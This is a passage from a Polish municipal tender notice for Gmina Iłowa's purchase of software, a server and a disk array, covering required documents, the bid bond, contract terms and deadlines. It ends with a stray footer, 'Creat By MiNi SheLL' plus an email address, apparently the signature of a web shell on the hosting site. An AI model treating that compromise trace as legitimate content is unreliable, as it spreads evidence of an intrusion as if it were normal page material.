przez<br/>Producenta i/lub we współpracy<br/>z Autoryzowanym Partnerem Serwisowym Producenta;<br/>c) Oświadczenie producenta sprzętu dla oferowanego serwera potwierdzające, że oferowany serwer posiada gwarancję w<br/>ramach której, w przypadku wystąpienia awarii dysku twardego w oferowanym serwerze, uszkodzony dysk twardy pozostaje<br/>u Zamawiającego;<br/>d) Dokumenty potwierdzające, że firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub<br/>równoważną) na świadczenie usług serwisowych oraz, że firma serwisująca posiada autoryzacje producenta oferowanego<br/>serwera.<br/>4. Macierz dyskowa<br/>a) Oświadczenie producenta potwierdzające, że serwis oferowanej macierzy będzie realizowany bezpośrednio przez<br/>Producenta i/lub we współpracy<br/>z Autoryzowanym Partnerem Serwisowym Producenta;<br/>b) Oświadczenie producenta dla oferowanej macierzy potwierdzające, że oferowana macierz posiada gwarancję w ramach<br/>której, w przypadku wystąpienia awarii dysku twardego w oferowanym serwerze, uszkodzony dysk twardy pozostaje u<br/>Zamawiającego;<br/>c) Dokumenty potwierdzające, że firma serwisująca posiada ISO 9001:2015 (lub równoważną) oraz ISO-27001 (lub<br/>równoważną) na świadczenie usług serwisowych oraz, że firma serwisująca posiada autoryzacje producenta oferowanego<br/>urządzenia.<br/>Uwaga:<br/>Przedmiotowe środki dowodowe składane są wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych na zasadach opisanych w art. 107 ust. 2 i 3<br/>ustawy Pzp.<br/>Zamawiający wezwie do złożenia lub uzupełnienia przedmiotowego środka dowodowego jedynie w sytuacji, gdy<br/>Wykonawca go nie złoży lub gdy złożony przedmiotowy środek dowodowy będzie niekompletny.<br/>Zamawiający nie wezwie do złożenia lub uzupełnienia przedmiotowego środka dowodowego, jeżeli służy on potwierdzeniu<br/>zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka<br/>dowodowego, oferta będzie podlegać odrzuceniu albo zachodzić będą przesłanki unieważnienia postępowania.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na Ofertę składa się:<br/>(1) Formularz oferty wypełniony zgodnie z Załącznikiem nr 2 do SWZ;<br/>(2) Formularz cenowo-techniczny wypełniony zgodnie z Załącznikiem nr 3 do SWZ.<br/>Wraz z Ofertą należy złożyć:<br/>(1) Przedmiotowe środki dowodowe, wskazane w pkt 2.1.11. SWZ;<br/>(2) Oświadczenie z art. 125 ust 1 ustawy Pzp (oświadczenie wstępne), o którym mowa w pkt 4.4.1.1. SWZ – zgodnie z<br/>Załącznikiem nr 4 do SWZ,<br/>(3) W przypadku wniesienia wadium w formie gwarancji lub poręczenia,<br/>o których mowa w pkt 3.2.2.2., 3.2.2.3., 3.2.2.4. SWZ, oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>W przypadku wniesienia wadium w pieniądzu, Zamawiający zaleca dołączenie do oferty dokumentu potwierdzającego<br/>dokonanie przelewu lub jego kopii,<br/>(4) Dokumenty i oświadczenia wskazane w pkt 4.4.1.2. – 4.4.1.7. SWZ – jeżeli dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wysokość wadium<br/>Wykonawca składający ofertę jest zobowiązany wnieść wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych).<br/>2. Forma wadium<br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>2.1. pieniądzu,<br/>2.2. gwarancjach bankowych,<br/>2.3. gwarancjach ubezpieczeniowych,<br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b pomoc finansowa udzielana przez Agencję ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2024 r. poz.<br/>419).<br/>3. Termin i sposób wniesienia wadium<br/>3.1. Wadium należy wnieść przed upływem terminu składania ofert określonego w pkt 6.2.1. SWZ i utrzymać nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2<br/>ustawy Pzp.<br/>3.2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: 50 9658<br/>0006 0000 1443 2007 0004<br/>z dopiskiem „wadium – dostawa oprogramowania oraz infrastruktury sprzętowej dla Gminy Iłowa”.<br/>Zaleca się dołączenie do oferty dokumentu potwierdzającego dokonanie przelewu lub jego kopii.<br/>3.3. Wadium wnoszone w pieniądzu winno znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu<br/>składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>3.4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa<br/>w pkt 3.2.2., 3.2.3. i 3.2.4. SWZ, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.<br/>3.5. Z dokumentu wadium wniesionego w formie gwarancji bankowej/ubezpieczeniowej lub poręczenia powinno wynikać<br/>jednoznacznie gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie<br/>Zamawiającego zawierające oświadczenie, że zachodzą okoliczności, o których mowa w art. 98 ust. 6 ustawy Pzp,<br/>stanowiące podstawę do żądania wypłaty należności. Wadium takie powinno obejmować cały okres związania ofertą,<br/>poczynając od daty składania ofert.<br/>Ponadto w dokumencie gwarancji lub poręczenia zaleca się wskazanie adresu e-mail Gwaranta lub Poręczyciela, na który<br/>Zamawiający będzie mógł przesłać oświadczenie o zwolnieniu wadium.<br/>3.6. Wadium wnosi się na rzecz Zamawiającego (beneficjenta):<br/>Gmina Iłowa<br/>ul. Żeromskiego 27<br/>68-120 Iłowa<br/>3.7. W przypadku wnoszenia wadium w formie gwarancji bankowej/ubezpieczeniowej przez Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego, zgodnie z wyrokiem KIO z dn. 24.06.2020 r., KIO 662/20, z<br/>dokumentu wadialnego powinno wynikać jednoznacznie, że zobowiązanie Gwaranta obejmuje wszystkich Wykonawców<br/>wspólnie ubiegających się o zamówienie oraz obejmuje wszystkie wskazane w ustawie Pzp przesłanki zatrzymania wadium,<br/>o których mowa w art. 98 ust. 6 ustawy Pzp, wynikające z działania lub zaniechania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3.8. Niewniesienie wadium, wniesienie w sposób nieprawidłowy, nieutrzymywanie wadium nieprzerwanie do upływu terminu<br/>związania ofertą lub złożenie wniosku<br/>o zwrot wadium w przypadku, o którym mowa w pkt 3.4.2.3. SWZ, skutkuje odrzuceniem oferty Wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania określono w rozdziale 4 SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały określone w załączniku nr 12 do SWZ - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-b216f127-6fea-48a9-9ec9-780eda944081</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-28 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com